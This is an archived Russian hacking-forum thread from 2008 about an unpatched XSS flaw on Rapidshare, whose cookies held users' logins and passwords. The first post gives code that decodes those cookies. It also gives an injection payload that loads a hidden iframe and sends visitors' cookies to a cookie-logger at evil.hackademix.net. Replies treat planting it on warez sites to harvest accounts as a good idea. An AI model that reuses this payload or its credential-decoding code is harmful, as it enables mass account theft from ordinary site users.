Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Болталка (https://forum.antichat.xyz/forumdisplay.php?f=46)
-   -   [XSS] Rapidshare (https://forum.antichat.xyz/showthread.php?t=77251)

Wh(te 15.07.2008 18:08

[XSS] Rapidshare
 
Nktpro любезно сообщил о последней XSS уязвимости на Rapidshare которая до сих пор не закрыта, несмотря на то , что о ней была оповещена администрация файлообменника еще месяц назад пользователями сайта.
Но на что Вы можете расчитывать от людей, которые хранят логин и пароль в cookie?
Да , убедитесь сами: Rapidshare cookie имеют вид: user=12345-%36%37%38%39%30.
В Javascript,
cookie = "username=" + login + "-" + pwd.replace(/./g, function(s) "%" + (s.charCodeAt(0).toString(16)))
Поэтому этих cookie достаточно для получения доступа
var [login, pwd] = cookie.replace(/.*=/,'').split("-"), pwd = unescape(pwd);

Это значит следующее , если включить этот код в сообщение в блоге который посещается множеством пользователей rapidshare , можно получить огромное колличество аккаунтов.


var injection = "<script>(" + (function() {

new Image().src = "http://evil.hackademix.net/cookielogger/rapidshare/?c=" +

escape(document.cookie);

}) + ")()</scr" + "ipt>"

var iframe = document.body.appendChild(document.createElement(" iframe"));

iframe.style.visibility = "hidden";

iframe.src = "http://rapidshare.com/cgi-bin/wiretransfer.cgi?extendaccount=12345%22" +

encodeURIComponent(injection);




15\07\2008 ©http://hackademix.net/

!JaX! 15.07.2008 18:15

Т.е если отписать этот код на варез сайте то мона получить ДоХуЙа акков?

_kREveDKo_ 15.07.2008 18:35

Угу, можно =)

.Sylar 15.07.2008 19:04

Оригинал:
Цитата:

But what can you expect by people who stores both your username and password inside your cookie?
Неправильный вариант перевода:
Цитата:

Но на что могли расчитывать люди , которые хранят логин и пароль в cookie?
Правильный вариант перевода:
Цитата:

Но на что Вы можете расчитывать от людей, которые хранят логин и пароль в cookie?


Время: 07:51